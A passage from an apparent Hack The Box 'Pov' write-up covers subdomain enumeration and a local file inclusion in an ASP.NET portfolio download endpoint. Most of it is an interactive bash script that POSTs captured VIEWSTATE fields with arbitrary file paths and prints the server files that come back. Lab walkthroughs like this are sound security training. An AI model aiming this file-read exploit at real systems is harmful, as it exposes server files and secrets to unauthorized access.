Only port 80 is open.


dirsearch, but nothing accessible was found.

echo "10.129.29.23 pov.htb" >> /etc/hosts
sudo gobuster vhost -u <http://pov.htb> -w /usr/share/wordlists/dnsmap.txt
Found the dev.pov.htb subdomain (status 302).


./dirsearch.py -u <http://dev.pov.htb/portfolio/> -x 404,302,403

by pressing “download”


As we can see, there is an LFI in the download endpoint.
Write a script to enumerate files:
#!/bin/bash
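#######################################
# POST one candidate path to the download endpoint and print the result.
# Arguments: $1 - value sent in the `file` parameter
# Outputs:   the response body (green) when the server did not answer with
#            "Error 404: Not Found"; otherwise a red "<path> not found." line,
#            or a red "LFI Error : <http_code>" line when the curl call fails
# Returns:   0 (all outcomes are reported on stdout, as in the original)
#######################################
lfi() {
  local path="$1"
  local url="<http://dev.pov.htb/portfolio/>"
  # ASP.NET postback fields captured from the page; only the trailing
  # `file` value changes between probes.
  local data="__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=oZdOFgVMnMUK%2FYsKb5EIbu8K5FHpcUxxiZo4DRwjqKXyaBZlr5C2B1qTDis2i3ay5jRdEkHIpxK%2FDtizrUyeFYsgG2I%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=q9%2BtrU8Llel1HIV8dNCMQjWweRAVxWvJLVMAhov2wealiJz5v86vse9faPve%2B2Ujm%2BGxnHiSCVy56Gzrmw%2BEzjrEGa%2BQ6qlezJahDpD%2BDppQ%2BivmcgEiaonMs2JLzDyETmEABw%3D%3D&file=$path"
  local response
  if response=$(curl -s -k -X POST --data-binary "$data" "$url"); then
    # The script keys on the body text, not the HTTP status: an unreadable
    # path is recognised by the literal "Error 404: Not Found" string.
    if ! grep -q "Error 404: Not Found" <<<"$response"; then
      # printf '%s' prints the body verbatim; `echo -e` would also interpret
      # any backslash sequences contained in the response itself.
      printf '\e[32m%s\e[0m\n' "$response"
    else
      printf '\e[31m%s not found.\e[0m\n' "$path"
    fi
  else
    # The original read an undefined $params here and so re-sent an empty
    # body; repeat the same request to report its HTTP status instead.
    local status
    status=$(curl -s -k -X POST --data-binary "$data" "$url" -o /dev/null -w '%{http_code}')
    printf '\e[31mLFI Error : %s\e[0m\n' "$status"
  fi
}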
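#######################################
# Interactive loop: prompt for a path and hand it to lfi until EOF.
# Globals:   none
# Arguments: none
# Outputs:   whatever lfi prints for each entered path
# Returns:   0 once stdin is exhausted
#######################################
main() {
  local path
  # Loop on the read status so Ctrl-D (EOF) ends the script; the original
  # `while true` kept spinning after read failed.  The prompt uses a single
  # backslash so $'…' yields a real escape byte rather than a literal "\e".
  while IFS= read -r -p $'\e[34m[+] file >> \e[0m' path; do
    lfi "$path"
  done
}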
# Only start the interactive loop when the file is executed directly,
# not when it is sourced to reuse the functions.
if [[ "${BASH_SOURCE[0]}" == "$0" ]]; then
  main
fi